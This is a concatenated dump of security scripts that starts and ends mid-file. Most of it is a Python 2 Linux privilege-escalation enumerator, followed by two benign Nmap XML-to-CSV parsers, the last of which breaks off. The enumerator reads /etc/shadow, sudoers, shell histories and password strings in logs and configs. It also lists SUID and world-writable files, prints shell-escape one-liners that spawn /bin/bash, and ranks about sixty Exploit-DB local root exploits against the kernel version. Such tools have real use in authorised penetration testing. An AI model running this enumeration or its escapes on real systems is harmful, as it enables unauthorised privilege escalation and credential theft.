f.write("[+] " + str(len(results)-1) + " " + msg) 70 | for result in results: 71 | if result.strip() != "": 72 | f.write(" " + result.strip()) 73 | f.close() 74 | return 75 | 76 | # Basic system info 77 | print "[*] GETTING BASIC SYSTEM INFO...\n" 78 | 79 | results=[] 80 | 81 | sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results}, 82 | "KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results}, 83 | "HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results} 84 | } 85 | 86 | sysInfo = execCmd(sysInfo) 87 | printResults(sysInfo) 88 | 89 | # Networking Info 90 | 91 | print "[*] GETTING NETWORKING INFO...\n" 92 | 93 | netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results}, 94 | "ROUTE":{"cmd":"route", "msg":"Route", "results":results}, 95 | "NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results} 96 | } 97 | 98 | netInfo = execCmd(netInfo) 99 | printResults(netInfo) 100 | 101 | # File System Info 102 | print "[*] GETTING FILESYSTEM INFO...\n" 103 | 104 | driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results}, 105 | "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results} 106 | } 107 | 108 | driveInfo = execCmd(driveInfo) 109 | printResults(driveInfo) 110 | 111 | # Scheduled Cron Jobs 112 | cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results}, 113 | "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results} 114 | } 115 | 116 | cronInfo = execCmd(cronInfo) 117 | printResults(cronInfo) 118 | 119 | # User Info 120 | print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n" 121 | 122 | userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results}, 123 | "ID":{"cmd":"id","msg":"Current User ID", "results":results}, 124 | "ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All 
users", "results":results}, 125 | "SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results}, 126 | "HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results}, 127 | "ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results}, 128 | "SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results}, 129 | "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results} 130 | } 131 | 132 | userInfo = execCmd(userInfo) 133 | printResults(userInfo) 134 | 135 | if "root" in userInfo["ID"]["results"][0]: 136 | print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n" 137 | 138 | # File/Directory Privs 139 | print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n" 140 | 141 | fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results}, 142 | "WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results}, 143 | "WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results}, 144 | "SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results}, 145 | "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results} 146 | } 147 | 148 | fdPerms = execCmd(fdPerms) 149 | 
printResults(fdPerms) 150 | 151 | pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results}, 152 | "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results}, 153 | "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results} 154 | } 155 | 156 | pwdFiles = execCmd(pwdFiles) 157 | printResults(pwdFiles) 158 | 159 | # Processes and Applications 160 | print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n" 161 | 162 | if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]: 163 | getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian 164 | else: 165 | getPkgs = "rpm -qa | sort -u" # RH/other 166 | 167 | getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results}, 168 | "PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results} 169 | } 170 | 171 | getAppProc = execCmd(getAppProc) 172 | printResults(getAppProc) # comment to reduce output 173 | 174 | otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results}, 175 | "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results}, 176 | "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results} 177 | } 178 | 179 | otherApps = execCmd(otherApps) 180 | printResults(otherApps) 181 | 182 | print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" 183 | 184 | # find the package information for the processes currently running 185 | # under root or 
another super user 186 | 187 | procs = getAppProc["PROCS"]["results"] 188 | pkgs = getAppProc["PKGS"]["results"] 189 | supusers = userInfo["SUPUSERS"]["results"] 190 | procdict = {} # dictionary to hold the processes running as super users 191 | 192 | for proc in procs: # loop through each process 193 | relatedpkgs = [] # list to hold the packages related to a process 194 | try: 195 | for user in supusers: # loop through the known super users 196 | if (user != "") and (user in proc): # if the process is being run by a super user 197 | procname = proc.split(" ")[4] # grab the process name 198 | if "/" in procname: 199 | splitname = procname.split("/") 200 | procname = splitname[len(splitname)-1] 201 | for pkg in pkgs: # loop through the packages 202 | if not len(procname) < 3: # name too short to get reliable package results 203 | if procname in pkg: 204 | if procname in procdict: 205 | relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list 206 | if pkg not in relatedpkgs: 207 | relatedpkgs.append(pkg) # add pkg to the list 208 | procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry 209 | except: 210 | pass 211 | 212 | for key in procdict: 213 | print " " + key # print the process name 214 | try: 215 | if not procdict[key][0] == "": # only print the rest if related packages were found 216 | print " Possible Related Packages: " 217 | for entry in procdict[key]: 218 | print " " + entry # print each related package 219 | except: 220 | pass 221 | 222 | # EXPLOIT ENUMERATION 223 | 224 | # First discover the avaialable tools 225 | print 226 | print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n" 227 | 228 | devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}} 229 | devTools = execCmd(devTools) 230 | printResults(devTools) 231 | 232 | print "[+] Related Shell Escape Sequences...\n" 233 | 
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]} 234 | for cmd in escapeCmd: 235 | for result in devTools["TOOLS"]["results"]: 236 | if cmd in result: 237 | for item in escapeCmd[cmd]: 238 | print " " + cmd + "-->\t" + item 239 | print 240 | print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n" 241 | 242 | # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB) 243 | # sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os' 244 | sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 245 | "< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 246 | "2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}}, 247 | "<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 248 | "2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 249 | "<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 250 | "2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 251 | "2.4.x / 2.6.x uselib() 
Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 252 | "2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}}, 253 | "<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 254 | "MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}}, 255 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 256 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 257 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 258 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}}, 259 | "<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 260 | "2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 261 | "Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}}, 262 | "Linux/Kernel 2.4/2.6 x86-64 
System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 263 | "< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}}, 264 | "2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 265 | "2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}}, 266 | "Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}}, 267 | "Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 268 | "< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 269 | "2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}}, 270 | "2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}}, 271 | "2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 272 | "2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 273 | "Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", 
"maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 274 | "Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 275 | "PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}}, 276 | "2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 277 | "2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 278 | "2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 279 | "2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 280 | "2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 281 | "< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 282 | "< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 283 | "2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 284 | "2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 285 | 
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}}, 286 | "'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}}, 287 | "2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 288 | "Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}}, 289 | "<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}}, 290 | "Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}}, 291 | "< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 292 | "Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 293 | "Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 294 | "<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 295 | "< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 296 | "CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", 
"keywords":{"loc":["kernel"], "val":"kernel"}}, 297 | "CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 298 | "< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 299 | "Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}}, 300 | "2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 301 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 302 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 303 | "Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}}, 304 | "open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 305 | "open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 306 | } 307 | 308 | # variable declaration 309 | os = sysInfo["OS"]["results"][0] 310 | version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0] 311 | langs = devTools["TOOLS"]["results"] 312 | procs = getAppProc["PROCS"]["results"] 313 | kernel = str(sysInfo["KERNEL"]["results"][0]) 314 | mount = 
driveInfo["MOUNT"]["results"] 315 | #pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future 316 | 317 | 318 | # lists to hold ranked, applicable sploits 319 | # note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks 320 | # all applicable exploits should be checked and this function could probably use some improvement 321 | avgprob = [] 322 | highprob = [] 323 | 324 | for sploit in sploits: 325 | lang = 0 # use to rank applicability of sploits 326 | keyword = sploits[sploit]["keywords"]["val"] 327 | sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"] 328 | # first check for kernell applicability 329 | if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]): 330 | # next check language applicability 331 | if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))): 332 | lang = 1 # language found, increase applicability score 333 | elif sploits[sploit]["lang"] == "sh": 334 | lang = 1 # language found, increase applicability score 335 | elif (sploits[sploit]["lang"] in str(langs)): 336 | lang = 1 # language found, increase applicability score 337 | if lang == 0: 338 | sploitout = sploitout + "**" # added mark if language not detected on system 339 | # next check keyword matches to determine if some sploits have a higher probability of success 340 | for loc in sploits[sploit]["keywords"]["loc"]: 341 | if loc == "proc": 342 | for proc in procs: 343 | if keyword in proc: 344 | highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability 345 | break 346 | break 347 | elif loc == "os": 348 | if (keyword in os) or (keyword in kernel): 349 | highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher 
probability/applicability 350 | break 351 | elif loc == "mnt": 352 | if keyword in mount: 353 | highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability 354 | break 355 | else: 356 | avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version 357 | 358 | print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!" 359 | print 360 | 361 | print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system" 362 | for exploit in highprob: 363 | print " - " + exploit 364 | print 365 | 366 | print " The following exploits are applicable to this kernel version and should be investigated as well" 367 | for exploit in avgprob: 368 | print " - " + exploit 369 | 370 | print 371 | print "Finished" 372 | print bigline 373 | -------------------------------------------------------------------------------- /nmap-files/nmap-ip-port-service-info-ssl-detect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Source: https://github.com/interference-security/scripts-tools-shells/blob/master/nmap-ip-port-service-info.py 4 | #Author: Interference Security 5 | 6 | #Usage: nmap-ip-port-service-info.py [-h] -f INPUTFILE [-o OUTFILE] 7 | #Example: nmap-ip-port-service-info.py -f input_nmap.xml -o output_file.csv 8 | 9 | try: 10 | import sys 11 | import argparse 12 | from datetime import datetime 13 | from libnmap.parser import NmapParser 14 | except: 15 | print "Error: Missing python packages\n" 16 | print "Please ensure you have the following python packages installed:\n argparse, python-libnmap\n" 17 | print "How to install:\npip install \neasy_install \n" 18 | sys.exit(0) 19 | 20 | #Description of script 21 | parser = 
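argparse.ArgumentParser(description="Nmap XML parser and generate CSV output")

#Script command line options
parser.add_argument('-i', '--inputfile', help='Input Nmap XML file', required=True)
parser.add_argument('-o', '--outfile', help='Save output in CSV file')
#parser.add_argument('-O','--open', help='Show only open ports')

args = parser.parse_args()

# Rows collected by parse_nmap_xml(); kept at module level so the last run can
# be inspected after the script has finished.
targets = []


def _csv_record(fields):
    """Join *fields* into one CSV record, quoting as RFC 4180 requires.

    A field containing a comma, a double quote or a line break is wrapped in
    double quotes (embedded quotes doubled).  Service banners come straight
    from the scanned host, so without this a crafted banner could add columns
    or whole rows to the report.  The function is hand-rolled rather than
    using csv.writer so that the same text is printed, written to the file
    and returned, under both Python 2 and 3.

    Args:
        fields: sequence of string values (None is written as an empty field).

    Returns:
        The record as a single string, without a trailing newline.
    """
    quoted = []
    for field in fields:
        if field is None:
            field = ""
        if any(ch in field for ch in ',"\r\n'):
            field = '"' + field.replace('"', '""') + '"'
        quoted.append(field)
    return ",".join(quoted)


def parse_nmap_xml(nmap_xml_file, output_file):
    """Turn an Nmap XML report into "IP,Port,State,Service Name,Service Info,SSL_TLS" rows.

    Every row is printed to stdout and, when *output_file* is non-empty, written
    to that file as well.  Rows are appended to the module-level ``targets``
    list, which is also returned.

    SSL_TLS is "Yes" only when the service carries an ``ssl-enum-ciphers`` NSE
    script result, otherwise "No".

    Args:
        nmap_xml_file: path of the Nmap XML report to parse.
        output_file: path of the CSV file to create; an empty value disables
            file output.

    Returns:
        list of CSV record strings, one per host/service pair.

    Raises:
        Whatever NmapParser.parse_fromfile() or open() raise; the CSV file is
        only created once parsing has succeeded.
    """
    nmap_parse = NmapParser.parse_fromfile(nmap_xml_file)
    for host in nmap_parse.hosts:
        for service in host.services:
            ssl_status = "No"
            # libnmap exposes NSE results as a list of dicts keyed by script id.
            for item in service.scripts_results:
                if "id" in item and item["id"].lower() == "ssl-enum-ciphers":
                    ssl_status = "Yes"
                    break
            targets.append(_csv_record([
                host.address,
                str(service.port),
                str(service.state),
                service.service,
                service.banner,
                ssl_status,
            ]))

    header = _csv_record(["IP", "Port", "State", "Service Name", "Service Info", "SSL_TLS"])
    # Always close the output file, even if a write fails part-way through.
    out = open(output_file, "w") if output_file else None
    try:
        for record in [header] + targets:
            print(record)
            if out is not None:
                out.write(record + "\n")
    finally:
        if out is not None:
            out.close()
    return targets


#Main function
output_file = ""
input_file = args.inputfile.encode('utf-8')
if args.outfile:
    output_file = args.outfile
targets = parse_nmap_xml(input_file, output_file)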
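#!/usr/bin/python
# /nmap-files/nmap-ip-port-service-info.py

#Source: https://github.com/interference-security/scripts-tools-shells/blob/master/nmap-ip-port-service-info.py
#Author: Interference Security

#Usage: nmap-ip-port-service-info.py [-h] -i INPUTFILE [-o OUTFILE]
#Example: nmap-ip-port-service-info.py -i input_nmap.xml -o output_file.csv

try:
    import sys
    import argparse
    from datetime import datetime
    from libnmap.parser import NmapParser
except ImportError:
    # Only a missing module is a "missing package" problem; anything else
    # should surface with its own traceback.  Exit non-zero so shell
    # pipelines and callers notice the failure.
    print("Error: Missing python packages\n")
    print("Please ensure you have the following python packages installed:\n argparse, python-libnmap\n")
    print("How to install:\npip install \neasy_install \n")
    sys.exit(1)

#Description of script
parser = argparse.ArgumentParser(description="Nmap XML parser and generate CSV output")

#Script command line options
parser.add_argument('-i', '--inputfile', help='Input Nmap XML file', required=True)
parser.add_argument('-o', '--outfile', help='Save output in CSV file')
#parser.add_argument('-O','--open', help='Show only open ports')

args = parser.parse_args()

# Rows collected by parse_nmap_xml(); kept at module level so the last run can
# be inspected after the script has finished.
targets = []


def _csv_record(fields):
    """Join *fields* into one CSV record, quoting as RFC 4180 requires.

    A field containing a comma, a double quote or a line break is wrapped in
    double quotes (embedded quotes doubled).  Service banners come straight
    from the scanned host, so without this a crafted banner could add columns
    or whole rows to the report.  The function is hand-rolled rather than
    using csv.writer so that the same text is printed, written to the file
    and returned, under both Python 2 and 3.

    Args:
        fields: sequence of string values (None is written as an empty field).

    Returns:
        The record as a single string, without a trailing newline.
    """
    quoted = []
    for field in fields:
        if field is None:
            field = ""
        if any(ch in field for ch in ',"\r\n'):
            field = '"' + field.replace('"', '""') + '"'
        quoted.append(field)
    return ",".join(quoted)


def parse_nmap_xml(nmap_xml_file, output_file):
    """Turn an Nmap XML report into "IP,Port,State,Service Name,Service Info" rows.

    Every row is printed to stdout and, when *output_file* is non-empty, written
    to that file as well.  Rows are appended to the module-level ``targets``
    list, which is also returned.

    Args:
        nmap_xml_file: path of the Nmap XML report to parse.
        output_file: path of the CSV file to create; an empty value disables
            file output.

    Returns:
        list of CSV record strings, one per host/service pair.

    Raises:
        Whatever NmapParser.parse_fromfile() or open() raise; the CSV file is
        only created once parsing has succeeded.
    """
    nmap_parse = NmapParser.parse_fromfile(nmap_xml_file)
    for host in nmap_parse.hosts:
        for service in host.services:
            targets.append(_csv_record([
                host.address,
                str(service.port),
                str(service.state),
                service.service,
                service.banner,
            ]))

    header = _csv_record(["IP", "Port", "State", "Service Name", "Service Info"])
    # Always close the output file, even if a write fails part-way through.
    out = open(output_file, "w") if output_file else None
    try:
        for record in [header] + targets:
            print(record)
            if out is not None:
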